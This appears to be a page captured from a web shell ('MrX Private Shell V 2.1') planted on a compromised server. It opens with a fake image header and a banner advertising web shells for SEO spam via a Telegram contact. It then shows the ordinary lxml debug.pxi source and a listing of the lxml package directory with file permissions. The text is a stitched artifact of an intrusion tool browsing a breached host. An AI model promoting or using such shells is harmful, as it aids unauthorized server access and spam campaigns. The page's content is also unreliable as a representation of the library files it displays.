����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@cython.final
@cython.internal
cdef class _MemDebug:
"""Debugging support for the memory allocation in libxml2.
"""
def bytes_used(self):
"""bytes_used(self)
Returns the total amount of memory (in bytes) currently used by libxml2.
Note that libxml2 constrains this value to a C int, which limits
the accuracy on 64 bit systems.
"""
return tree.xmlMemUsed()
def blocks_used(self):
"""blocks_used(self)
Returns the total number of memory blocks currently allocated by libxml2.
Note that libxml2 constrains this value to a C int, which limits
the accuracy on 64 bit systems.
"""
return tree.xmlMemBlocks()
def dict_size(self):
"""dict_size(self)
Returns the current size of the global name dictionary used by libxml2
for the current thread. Each thread has its own dictionary.
"""
c_dict = __GLOBAL_PARSER_CONTEXT._getThreadDict(NULL)
if c_dict is NULL:
raise MemoryError()
return tree.xmlDictSize(c_dict)
memory_debugger = _MemDebug()
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| html | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| isoschematron | Folder | 0755 |
|
|
| ElementInclude.py | File | 8.36 KB | 0644 |
|
| __init__.py | File | 574 B | 0644 |
|
| _elementpath.cpython-312-x86_64-linux-gnu.so | File | 212.26 KB | 0755 |
|
| _elementpath.py | File | 10.7 KB | 0644 |
|
| apihelpers.pxi | File | 62.38 KB | 0644 |
|
| builder.cpython-312-x86_64-linux-gnu.so | File | 126.05 KB | 0755 |
|
| builder.py | File | 8.29 KB | 0644 |
|
| classlookup.pxi | File | 21.91 KB | 0644 |
|
| cleanup.pxi | File | 8.26 KB | 0644 |
|
| cssselect.py | File | 3.23 KB | 0644 |
|
| debug.pxi | File | 1.1 KB | 0644 |
|
| docloader.pxi | File | 5.64 KB | 0644 |
|
| doctestcompare.py | File | 17.32 KB | 0644 |
|
| dtd.pxi | File | 14.92 KB | 0644 |
|
| etree.cpython-312-x86_64-linux-gnu.so | File | 5.15 MB | 0755 |
|
| etree.h | File | 9.56 KB | 0644 |
|
| etree.pyx | File | 134.78 KB | 0644 |
|
| etree_api.h | File | 16.96 KB | 0644 |
|
| extensions.pxi | File | 31.27 KB | 0644 |
|
| iterparse.pxi | File | 16.13 KB | 0644 |
|
| lxml.etree.h | File | 9.56 KB | 0644 |
|
| lxml.etree_api.h | File | 16.97 KB | 0644 |
|
| nsclasses.pxi | File | 8.92 KB | 0644 |
|
| objectify.cpython-312-x86_64-linux-gnu.so | File | 2.8 MB | 0755 |
|
| objectify.pyx | File | 74.05 KB | 0644 |
|
| objectpath.pxi | File | 11.18 KB | 0644 |
|
| parser.pxi | File | 83.41 KB | 0644 |
|
| parsertarget.pxi | File | 6.18 KB | 0644 |
|
| proxy.pxi | File | 23.37 KB | 0644 |
|
| public-api.pxi | File | 6.51 KB | 0644 |
|
| pyclasslookup.py | File | 92 B | 0644 |
|
| readonlytree.pxi | File | 18.53 KB | 0644 |
|
| relaxng.pxi | File | 6.19 KB | 0644 |
|
| sax.cpython-312-x86_64-linux-gnu.so | File | 185.81 KB | 0755 |
|
| sax.py | File | 9.48 KB | 0644 |
|
| saxparser.pxi | File | 32.74 KB | 0644 |
|
| schematron.pxi | File | 5.92 KB | 0644 |
|
| serializer.pxi | File | 66.47 KB | 0644 |
|
| usedoctest.py | File | 230 B | 0644 |
|
| xinclude.pxi | File | 2.4 KB | 0644 |
|
| xmlerror.pxi | File | 48.89 KB | 0644 |
|
| xmlid.pxi | File | 5.93 KB | 0644 |
|
| xmlschema.pxi | File | 8.29 KB | 0644 |
|
| xpath.pxi | File | 18.68 KB | 0644 |
|
| xslt.pxi | File | 35.46 KB | 0644 |
|
| xsltext.pxi | File | 10.83 KB | 0644 |
|